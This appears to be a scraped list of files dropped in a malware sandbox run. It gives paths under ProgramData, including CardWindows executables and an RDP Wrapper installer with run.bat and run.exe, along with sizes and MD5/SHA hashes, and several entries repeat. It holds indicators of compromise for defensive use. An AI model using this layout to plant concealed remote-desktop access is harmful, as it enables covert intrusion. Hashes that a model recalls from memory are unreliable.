b3638113405efc8eadc7d7638d6d47f5319cf811

SHA256
1a978563255ada2ee332405f2a553842e131475f06e6dfaa38166358bbd9683b

SHA512
05f372d2b97764745922d0a4ad908d8ae0b439109e3702824cc162ed0b4f1347381481469943f5521a8bf90471e1cbc2fad088bf33a4ea8224c187b1f8a8ec22

Download Submit
C:\ProgramData\CardWindows\start1.exe

Filesize
394KB

MD5
8c83dc3eb8124dd9cdaa95a0a1ad45d4

SHA1
9428c90a79281d5dc84205e435833f0c75f4ae3c

SHA256
35c5a75bce725f0132ebd59c5c8f090df3f0fb70e8f0f83cad8f9983a58a887b

SHA512
f2a1856ad6189fd189d64922e80201957f19601f05783a1b5543bb62f4e2921074a3dc522bf4b4307ea1ac2f1e2e18de9384d86a721073a332d75ac309c82d5d

Download Submit
C:\ProgramData\CardWindows\start1.exe

Filesize
394KB

MD5
8c83dc3eb8124dd9cdaa95a0a1ad45d4

SHA1
9428c90a79281d5dc84205e435833f0c75f4ae3c

SHA256
35c5a75bce725f0132ebd59c5c8f090df3f0fb70e8f0f83cad8f9983a58a887b

SHA512
f2a1856ad6189fd189d64922e80201957f19601f05783a1b5543bb62f4e2921074a3dc522bf4b4307ea1ac2f1e2e18de9384d86a721073a332d75ac309c82d5d

Download Submit
C:\ProgramData\CardWindows\sysdevices.exe

Filesize
5.1MB

MD5
271dc5107c866fd480b1256f0ce0e36c

SHA1
0d9c7e060b57a8177664233ad99049963b3fd83b

SHA256
dfa101c21fba688512ef911988e1d72199c1ec5c3571f91da214faa0fac7cba4

SHA512
fb23837f2c69c5f0a938ff3f44a8158321394117c9466a0fa6865fd85914f51970f4afe0873e440e4ad6d502d839cb57c07b502905641dceebeae5eb61143784

Download Submit
C:\ProgramData\CardWindows\sysdevices.exe

Filesize
5.1MB

MD5
271dc5107c866fd480b1256f0ce0e36c

SHA1
0d9c7e060b57a8177664233ad99049963b3fd83b

SHA256
dfa101c21fba688512ef911988e1d72199c1ec5c3571f91da214faa0fac7cba4

SHA512
fb23837f2c69c5f0a938ff3f44a8158321394117c9466a0fa6865fd85914f51970f4afe0873e440e4ad6d502d839cb57c07b502905641dceebeae5eb61143784

Download Submit
C:\ProgramData\CardWindows\sysdevices.exe

Filesize
5.1MB

MD5
271dc5107c866fd480b1256f0ce0e36c

SHA1
0d9c7e060b57a8177664233ad99049963b3fd83b

SHA256
dfa101c21fba688512ef911988e1d72199c1ec5c3571f91da214faa0fac7cba4

SHA512
fb23837f2c69c5f0a938ff3f44a8158321394117c9466a0fa6865fd85914f51970f4afe0873e440e4ad6d502d839cb57c07b502905641dceebeae5eb61143784

Download Submit
C:\ProgramData\CardWindows\vp8decoder.dll

Filesize
378KB

MD5
d43fa82fab5337ce20ad14650085c5d9

SHA1
678aa092075ff65b6815ffc2d8fdc23af8425981

SHA256
c022958429edd94bfe31f2eacfe24ff6b45d6f12747725c449a36116373de03b

SHA512
103e61a9f58df03316676a074487e50ec518479c11068df3736df139b85c7671048c65bce0ef2c55b3c50c61fde54e9e6c7d1b795aea71263ae94c91d4874e0d

Download Submit
C:\ProgramData\CardWindows\vp8encoder.dll

Filesize
1.6MB

MD5
dab4646806dfca6d0e0b4d80fa9209d6

SHA1
8244dfe22ec2090eee89dad103e6b2002059d16a

SHA256
cb6ef96d3a66ef08ec2c8640b751a52d6d4f4530cf01162a69966f0fd5153587

SHA512
aa5eb93bf23a10de797d6fb52a55a95d36bc48927c76fedd81e0c48872745cb7f7d1b3f230eaae42fd4e79b6a59ca707e56bd6963b03644cbd5984f11e98d6e7

Download Submit
C:\ProgramData\RDP\RDPWInst.exe

Filesize
1.3MB

MD5
9c257b1d15817a818a675749f0429130

SHA1
234d14da613c1420ea17de60ab8c3621d1599f6f

SHA256
b92962c2b4794ee418f0248743131d472a10ac96e520dda2afddf8ca3f3cd64c

SHA512
b63fb6ba7b622f95fc151ca62c339368991c3c4c22e4bbe2305ac7172ee3f10e5049850e87cf3b87a13f4f15c516fbd20cadde9197064b659ffc66599e71d521

Download Submit
C:\ProgramData\RDP\RDPWInst.exe

Filesize
1.3MB

MD5
9c257b1d15817a818a675749f0429130

SHA1
234d14da613c1420ea17de60ab8c3621d1599f6f

SHA256
b92962c2b4794ee418f0248743131d472a10ac96e520dda2afddf8ca3f3cd64c

SHA512
b63fb6ba7b622f95fc151ca62c339368991c3c4c22e4bbe2305ac7172ee3f10e5049850e87cf3b87a13f4f15c516fbd20cadde9197064b659ffc66599e71d521

Download Submit
C:\ProgramData\RDP\RDPWrapper.exe

Filesize
1.6MB

MD5
e4814efdb3d6761683665c487a02ef2b

SHA1
ecd25ee74af98658000e36b90c58af628b6ab6b8

SHA256
5f4aa202be2bb72123a8aac89322e00bf8d8daf027d510bb368df3dd093a7e23

SHA512
982558f59250bc213de5f27e7aac5fa5975e0ab9c979d23e4836b0a493c598d1d804c42d5a9faa1214892b4b1c2c6733be44a00966f65bdbb62946198d08d0e5

Download Submit
C:\ProgramData\RDP\RDPWrapper.exe

Filesize
1.6MB

MD5
e4814efdb3d6761683665c487a02ef2b

SHA1
ecd25ee74af98658000e36b90c58af628b6ab6b8

SHA256
5f4aa202be2bb72123a8aac89322e00bf8d8daf027d510bb368df3dd093a7e23

SHA512
982558f59250bc213de5f27e7aac5fa5975e0ab9c979d23e4836b0a493c598d1d804c42d5a9faa1214892b4b1c2c6733be44a00966f65bdbb62946198d08d0e5

Download Submit
C:\ProgramData\RDP\RDPWrapper_run.exe

Filesize
368KB

MD5
35862d6de7d5f5a21a111f4e9c831839

SHA1
891e59e3a6798ac60ef333cdfb7969ef02a3e77c

SHA256
5f701eb1a3d0aeea8242431cf44b6ceccb364c2f430b8577bcfa4e6a3fca7b55

SHA512
00868a01af48be7d2c5c619891c77620e616ac05969c2c3dd146f551976b59be476ce6cbbaf87888aa14d5de2aa498a469440f0085f1ae063e7681e7a44cef56

Download Submit
C:\ProgramData\RDP\RDPWrapper_run.exe

Filesize
368KB

MD5
35862d6de7d5f5a21a111f4e9c831839

SHA1
891e59e3a6798ac60ef333cdfb7969ef02a3e77c

SHA256
5f701eb1a3d0aeea8242431cf44b6ceccb364c2f430b8577bcfa4e6a3fca7b55

SHA512
00868a01af48be7d2c5c619891c77620e616ac05969c2c3dd146f551976b59be476ce6cbbaf87888aa14d5de2aa498a469440f0085f1ae063e7681e7a44cef56

Download Submit
C:\ProgramData\RDP\run.bat

Filesize
612B

MD5
4e6a1033e3c2f39db397d392fe0d7c77

SHA1
11526234cd216334902d51665529c2b9be7acc05

SHA256
2eb8001ce06e7b2764fb7b4e637d53583e365640e72a3d53e1d3b4790ae306d4

SHA512
395293d8ecd67f4c32702b11fdf0761f9e283346274ee1e4c4a3f47672fc683be4917fd87da2fde4e3d7e986e3884799329f9f28082e89f75aa17ca38c46dceb

Download Submit
C:\ProgramData\RDP\run.exe

Filesize
368KB

MD5
c4f61801834172c1f1973e8791311340

SHA1
de48c219435feda6680c474b445c8f548441abc7

SHA256
c396dcc91a1fe215773eef9435d35734d76e7324ba1a40b46fa15f43acb3488d

SHA512
8fc16d1375f20a531593873aac252f0394315004bc51e55e14c0e93f2ea76272a6965da30228a7f16e01e1e42a49ec759afd46c6b914154c766c1a8d39b2a0b7

Download Submit
C:\ProgramData\RDP\run.exe

Filesize
368KB

MD5
c4f61801834172c1f1973e8791311340

SHA1
de48c219435feda6680c474b445c8f548441abc7

SHA256
c396dcc91a1fe215773eef9435d35734d76e7324ba1a40b46fa15f43acb3488d

SHA512
8fc16d1375f20a531593873aac252f0394315004bc51e55e14c0e93f2ea76272a6965da30228a7f16e01e1e42a49ec759afd46c6b914154c766c1a8d39b2a0b7

Download Submit